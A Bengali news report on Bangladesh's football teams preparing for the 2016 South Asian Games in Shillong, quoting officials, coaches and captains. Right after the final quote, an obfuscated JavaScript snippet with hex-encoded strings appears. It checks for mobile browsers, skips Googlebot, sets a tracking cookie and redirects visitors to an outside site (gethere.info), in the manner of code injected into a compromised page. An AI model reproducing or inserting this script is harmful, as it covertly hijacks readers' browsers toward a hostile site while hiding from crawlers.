for Add
: ৩ ফেব্রুয়ারি ২০১৬, বুধবার, ২০:২৯:৩১
নিজস্ব প্রতিবেদক : গেমসে ফুটবল ছাড়াও থাকে অনেক ডিসিপ্লিন। কিন্তু ফুটবলের স্বর্ণের দামটা যেন বেশি। অন্য কোনো খেলায় স্বর্ণ না পেলেও শুধু ফুটবলে পেলেই যেন আলাদা আনন্দ। দক্ষিণ এশিয়ান (এসএ) গেমস ফুটবলের সর্বশেষ আসরে বাংলাদেশ সবচেয়ে ভালো ফলাফল করেছিল। পেয়েছিল ১৮ স্বর্ণ্। এর মধ্যে ছিল পুরুষ ফুটবলেও। এবার সেই স্বর্ণ ধরে রাখার চ্যালেঞ্জ। চারিদিকে একটাই প্রশ্ন-থকবোতো ফুটবলের স্বর্ণ?। অসংখ্য মানুষের মনের এ প্রশ্ন সঙ্গী করে আগামীকাল শিলং যাচ্ছে অলিম্পিক ফুটবল দল।
দক্ষিণ এশিয়ার অলিম্পিক গেমস খ্যাত সাউথ এশিয়ান গেমস (এসএ গেমস) ক্রীড়া আসরে অংশ নিতে আজ (বুধবার) সকালে ভারতের শিলংয়ে গেছে বাংলাদেশ জাতীয় মহিলা ফুটবল দল। উভয় দলেরই লক্ষ্য ভাল ফল করা।
পুরুষ দলের এসএ গেমসে অংশগ্রহণ নিয়ে আজ (বুধবার) বাংলাদেশ ফুটবল ফেডারেশন (বাফুফে) ভবনে এক সংবাদ সম্মেলন অনুষ্ঠিত হয়। এতে উপস্থিত ছিলেন ন্যাশনাল টিমস কমিটির চেয়ারম্যান এবং বাফুফের সহ-সভাপতি কাজী নাবিল আহমেদ এমপি, বাফুফে সহ-সভাপতি বাদল রায়, পুরুষ ফুটবল দলের ম্যানেজার সত্যজিৎ দাস রূপু, দলনেতা হাসানুজ্জামান খান বাবলু, বাফুফের সাধারণ সম্পাদক আবু নাইম সোহাগ, পুরুষ দলের কোচ গঞ্জালো সানচেজ মরেনো, সহকারী কোচ সৈয়দ গোলাম জিলানী এবং অধিনায়ক রেজাউল করিম।
কাজী নাবিল আহমেদ বলেন, ‘সাম্প্রতিক অতীতের ব্যর্থতা ভুলে এবার ভাল কিছু উপহার দেবে বাংলাদেশ অলিম্পিক দল। গ্রুপিংটাও বেশ ভাল হয়েছে। প্রথম ম্যাচ জিতলেই সেমিফাইনালে এক পা বাংলাদেশের। দলের স্প্যানিশ কোচ গঞ্জালোর ওপরও আস্থা আছে আমাদের। কিছু সমস্যা ছিল। কোচের সঙ্গে কথা বলে জানতে পেরেছি সেগুলো কাটিয়ে উঠা সম্ভব হয়েছে। দল নিয়ে তিনি সন্তুষ্ট।’
বাংলাদেশ জাতীয় দল এবং অলিম্পিক দলের সাম্প্রতিক সময়ের পারফরম্যান্সে এই দলকে নিয়ে শিরোপা প্রত্যাশা করা কতটা যৌক্তিক? কেননা এই দল খেলেছে বঙ্গবন্ধু গোল্ডকাপে। জাতীয় দলের ৬ ফুটবলার আছেন এই দলে। ‘বৃক্ষ তোমার নাম কি? ফলে পরিচয়। প্রস্তুতি যেমনই হোক না কেন, ফলটা কি হলো, সেটাই হচ্ছে আসল মূল ব্যাপার। আমাদের অনেকগুলো আন্তর্জাতিক ম্যাচ খেলা হয়েছে। প্রস্তুতির কোন অভাব আছে বলে মনে হয় না। এই খেলোয়াড়রাই ঘুরে ফিরে বিভিন্ন কোচের অধীনে খেলেছে। প্রধান বিষয় হলো মাঠে ৯০ মিনিট খেলাটা। শেষ মিনিটে গোল খেলে চলবে না। শেষ বাঁশিটা বাজা পর্যন্ত পারফরম্যান্স করাটাই মুখ্য বিষয়’-বলেছেন কাজী নাবিল আহমেদ।
সংবাদ সম্মেলনে ‘ধন্যবাদ, শুভ সকা’ বলে কথা শুরু করেন কোচ গঞ্জালো। এ স্প্যানিশ কোচে বলেন, ‘আমাদের লক্ষ্য ম্যাচ বাই ম্যাচ জেতা। প্রধান লক্ষ্য ভুটানকে হারানো। এর পরের ম্যাচটা দেখা যাক কি হয়।’
এসএ গেমসের বর্তমান চ্যাম্পিয়ন বাংলাদেশ। শিরোপা ধরে রাখা কতটা সম্ভব? ‘যেহেতু নেপাল, ভুটান আছে আমাদের গ্রুপে, তাই সেমিফাইনালে যাওয়াটা খুব সহজ হবে না। তবে সম্ভাবনা আছে। আমরা যদি ম্যাচে মনযোগ দিয়ে আমাদের করণীয় কাজগুলো ঠিকঠাক করতে পারি এবং নিজেদের খেলাটা খেলতে পারি, তাহলে অবশ্যই লক্ষ্যপূরণ সম্ভব’-জবাব কোচের।
অধিনায়ক রেজাউল করিম বলেন, ‘ বিগত সময়ে আমরা সাফ সুজকি কাপ এবং বঙ্গবন্ধু গোল্ডকাপ খেলেছি। সেখানে আমরা আশাব্যঞ্জক ফল আনতে পারিনি। তবে আশাবাদী এবারের এসএ গেমসে আমরা ভাল করব। গত আসরের শিরোপা ধরে রাখার দৃঢ় মানসিকতা রয়েছে আমাদের সবার মধ্যে। এবং সোনা জিতেই দেশে ফিরবো ইনশাল্লাহ।’
উল্লেখ্য এসএ গেমসের এবারের আসরে ফুটবলে ‘বি’ গ্রুপে থাকা বাংলাদেশের প্রতিপক্ষ হিসেবে আছে নেপাল ও ভুটান। গতবারের এসএ গেমসে আফগানিস্তানকে হারিয়ে স্বর্ণ জিতেছিল বাংলাদেশ।
এদিকে পারিবারিক সমস্যার জন্য এসএ গেমসে খেলতে অপারগতা প্রকাশ করেছেন ফরোয়ার্ড সাখাওয়াত হোসেন রনি। তার পরিবর্তে দলে এসেছেন নাবিব নেওয়াজ জীবন।
৯ ফেব্রুয়ারি ভুটানের বিপক্ষে ম্যাচ দিয়ে এবারের এসএ গেমসের মিশন শুরু করবে গঞ্জালোর শিষ্যরা। ১১ ফেব্রুয়ারি নিজেদের দ্বিতীয় ম্যাচে নেপালের মুখোমুখি হবে বাংলাদেশ।
এদিকে ভারত যাওয়ার আগে বাংলাদেশ জাতীয় মহিলা ফুটবল দলের নতুন অধিনায়ক-ফরোয়ার্ড সাবিনা খাতুন বলেন, ‘আমরা তিন মাস ধরে এসএ গেমসের জন্য প্রস্তুতি নিচ্ছি। সময়টা যদিও বেশি না, তবে দলের পারফরম্যান্সে অনেক উন্নতি এসেছে। খেলোয়াড়রা অনেক বেশি উজ্জীবিত ও চ্যালেঞ্জ গ্রহণে তৈরি।’
মহিলা ফুটবল দলের কোচ গোলাম রব্বানী ছোটন বলেন, ‘আগের আসরে আমাদের দল ছিল অনভিজ্ঞ। এবার আমরা যাচ্ছি কিছু অভিজ্ঞ ফুটবলার নিয়ে। তাই আমার মনে হয় আগে যেভাবে প্রতিপক্ষকে ভয় পেয়ে বা বাড়তি সম্মান দিয়ে খেলতে নামতাম সেই অবস্থার পরিবর্তন হয়েছে। এই দলকে নিয়ে ফাইনালে খেলার আশা করতেই পারি।’var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}
For add
For add
For add
For add
for Add